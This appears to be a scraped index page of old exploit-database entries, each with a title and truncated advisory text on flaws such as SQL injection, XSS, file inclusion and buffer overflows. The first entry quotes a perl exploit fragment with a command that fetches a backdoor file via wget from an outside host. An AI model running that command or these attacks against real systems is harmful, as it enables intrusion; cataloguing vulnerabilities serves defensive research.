Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)

No description provided by source. This exploit uses a backdoor that isn't located on this server. $cmde = cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: WebHints Remot...

HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/30320/info HiFriend is prone to an open-email-relay vulnerability. An attacker could exploit this issue by constructing a script that would send unsolicited bulk email to an unrestricted amount of email addresses with a...

Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8290/info Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload. !/usr/bin/perl Cisco Global...

Nuked-Klan 1.7 Links Module link_id Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. These vulnerabilities...

mcGuestbook 1.3 admin.php lang Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote file...

Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28247/info Virtual Support Office XP VSO-XP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...

Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3308/info Hassan Consulting's Shopping Cart is commercial web store software. Shopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a...

myBloggie 2.1.5 login.php PATH_INFO Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/22097/info MyBloggie is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...

PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module - 'id' Parameter SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28063/info The 'gaestebuch' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...

Slackware Linux <= 3.5 /etc/group missing results in root access Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/155/info Due to the way /bin/login behaves when a /etc/group file is not present under Slackware's version of the password shadowing suite, users who log in while this file is not present will be given uid and gid 0. This...

NooMS 1.1 - smileys.php page_id Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/31131/info NooMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browse...

Joe Text Editor 2.8 .joerc Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2437/info Joe is a text editor originally written by Joseph Allen. Joe offers a user-friendly interface, with key binding and configuration familiar to many users of Microsoft Word Processing tools. A problem in the...

MusicBox 2.3.4 Page Parameter SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/19129/info MusicBox is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful attack could allow an attacker to compromise the...

Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2935/info The 'whodo' utility shipped with Sun Microsystems' Solaris provides a listing of users online and their activities. It is installed setuid root because it reads from the 'utmp' log as well as from the process...

Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8873/info A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts...

MWChat 6.8 Chat.PHP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15198/info MWChat is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could resul...

Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS

No description provided by source. source: http://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script...

CitrusDB 0.3.6 - Remote Authentication Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/12560/info CitrusDB is reportedly affected by an authentication bypass vulnerability. This issue is due to the application using a static value during the creation of user cookie information. An attacker could exploit thi...

SleeperChat 0.3f Index.PHP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/16363/info SleeperChat is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...

FunkBoard 0.66 editpost.php Multiple Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues t...